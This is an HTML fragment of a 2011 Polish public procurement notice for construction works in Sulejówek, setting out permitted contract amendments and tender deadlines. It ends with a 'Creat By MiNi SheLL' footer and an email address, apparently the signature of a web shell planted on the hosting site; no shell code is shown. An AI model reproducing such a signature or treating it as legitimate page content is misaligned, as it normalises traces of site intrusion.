<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana jest możliwa w przypadku wystąpienia co najmniej jednej z okoliczności wymienionej poniżej, z uwzględnieniem podanych warunków ich wprowadzenia:

1	Zmiana terminu przewidzianego na zakończenie robot:
1)  zmiany spowodowane warunkami atmosferycznymi w szczególności:
a) klęski żywiołowe;
b) warunki atmosferyczne odbiegające od typowych, uniemożliwiające prowadzenie robót budowlanych, przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów;
2)  zmiany będące następstwem okoliczności leżących po stronie Zamawiającego
szczególności:
a)	wstrzymanie robót przez Zamawiającego;
b)	konieczność usunięcia błędów lub wprowadzenia zmian w dokumentacji lub specyfikacji technicznej wykonania i odbioru robót;
c)	zmiany będące następstwem działania organów administracji i innych podmiotów o kompetencjach zbliżonych do organów administracji;
3) inne przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy skutkujące niemożliwością prowadzenia prac lub wykonywania innych czynności przewidzianych umową, w szczególności na skutek zlecenia Wykonawcy zamówień dodatkowych zgodnie z przepisami odrębnymi;
4)	W przypadku wystąpienia którejkolwiek z okoliczności wymienionych wyżej, termin
przewidziany na ukończenie robót może ulec odpowiedniemu przedłużeniu, o czas
niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej
jednak niż o okres trwania tych okoliczności.
2	Zmiana sposobu spełnienia świadczenia na skutek zmian technologicznych spowodowanych w szczególności następującymi okolicznościami:
1)	niedostępność na rynku materiałów lub urządzeń wskazanych w dokumentacji przetargowej lub specyfikacji technicznej wykonania i odbioru robót spowodowana zaprzestaniem produkcji lub wycofaniem z rynku tych materiałów lub urządzeń;
2)	pojawienie się na rynku materiałów lub urządzeń nowszej generacji pozwalających na zaoszczędzenie kosztów realizacji przedmiotu umowy lub kosztów eksploatacji wykonanego przedmiotu umowy, lub umożliwiające uzyskanie lepszej jakości robót;
3)	pojawienie się nowszej technologii wykonania zaprojektowanych robót pozwalającej na zaoszczędzenie czasu realizacji inwestycji lub kosztów wykonywanych prac, jak również kosztów eksploatacji wykonanego przedmiotu umowy;
4)	konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych/technologicznych niż wskazane w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy,
5)	odmienne od przyjętych w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót warunki geologiczne skutkujące niemożliwością zrealizowania przedmiotu umowy przy dotychczasowych założeniach technologicznych;
6)	konieczność zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa;
W przypadku wystąpienia którejkolwiek z okoliczności wymienionych powyżej możliwa jest w szczególności zmiana sposobu wykonania, materiałów i technologii robót, jak również zmiany lokalizacji budowanych urządzeń.
3	Pozostałe rodzaje zmian spowodowane następującymi okolicznościami:
1)	zmiana osób, przy pomocy których Wykonawca i Zamawiający realizuje przedmiot umowy na inne spełniające warunki określone w SIWZ np. osób z uprawnieniami budowlanymi;
2)	zmiana osób podanych w ofercie wykonawcy, przy pomocy których Wykonawca realizuje przedmiot umowy nie wymaga aneksu do umowy (zmiana jest możliwa na osoby spełniające wymogi SIWZ, a dla skutecznej zmiany niezbędne jest uzyskanie zgody Zamawiającego na zaproponowaną osobę);
3)	siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ;
4)	zmiana obowiązującej stawki VAT;
5)	zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz Wykonawcy na skutek zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych dotyczących realizacji projektu;
6)	rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy;
7)	kolizja z planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycjami (W  takim przypadku zmiany w umowie zostaną ograniczone do zmian koniecznych powodujących uniknięcie lub usunięcie kolizji.);
8)	zmiany uzasadnione okolicznościami, o których mowa w art. 3571 §1 Kodeksu cywilnego;
9)	gdy zaistnieje inna okoliczność prawna, ekonomiczna lub techniczna, skutkująca niemożliwością wykonania lub należytego wykonania umowy zgodnie z SIWZ.

W przypadku wystąpienia okoliczności wymienionych wyżej, możliwa jest w szczególności zmiana sposobu wykonania, materiałów i technologii robót.
W przypadku  zmiany stawki VAT podpunkt 4 zmiana dotyczyć będzie ceny umownej, w części, jakiej dotyczą te zmiany przepisów. 
W przypadku ppkt. 5, zmiany dostosują sposób rozliczeń lub płatności do wymogów zmienionej umowy o dofinansowanie projektu lub nowych wytycznych dotyczących realizacji projektu.
W przypadku ppkt. 6, zmiany mogą dotyczyć zakresu wykonywanych prac, zmian dokumentacji i zmniejszenia wynagrodzenia o kwoty odpowiadające cenie robót, z których Zamawiający rezygnuje.
Zmiana wynagrodzenia Wykonawcy jest możliwa w przypadkach wskazanych wyżej,
na zasadach określonych w warunkach umowy.

4	Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.

5	Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Prawo zamówień publicznych:
1) zmiana danych teleadresowych,
2) zmiana danych związanych z obsługą administracyjno-organizacyjną Umowy (np. zmiana nr rachunku bankowego);
3) udzielenie zamówień dodatkowych lub uzupełniających określonych w przepisach o zamówieniach publicznych;
Strona, która występuje z propozycją zmiany umowy, w oparciu o przedstawiony powyżej katalog zmian umowy zobowiązana jest do sporządzenia i uzasadnienia wniosku o taką zmianę. Wszelkie zmiany umowy dla swej ważności wymagają formy pisemnej w postaci aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ekoinwestycja.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Armii Krajowej 34, 05-071 Sulejówek.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.11.2011 godzina 09:00, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego  w Sulejówku, ul. Dworcowa 55, 
w biurze podawczym (parter).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest współfinansowane ze środków Unii Europejskiej ze środków Funduszu Spójności w ramach Programu Operacyjnego Infrastruktura i Środowisko.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com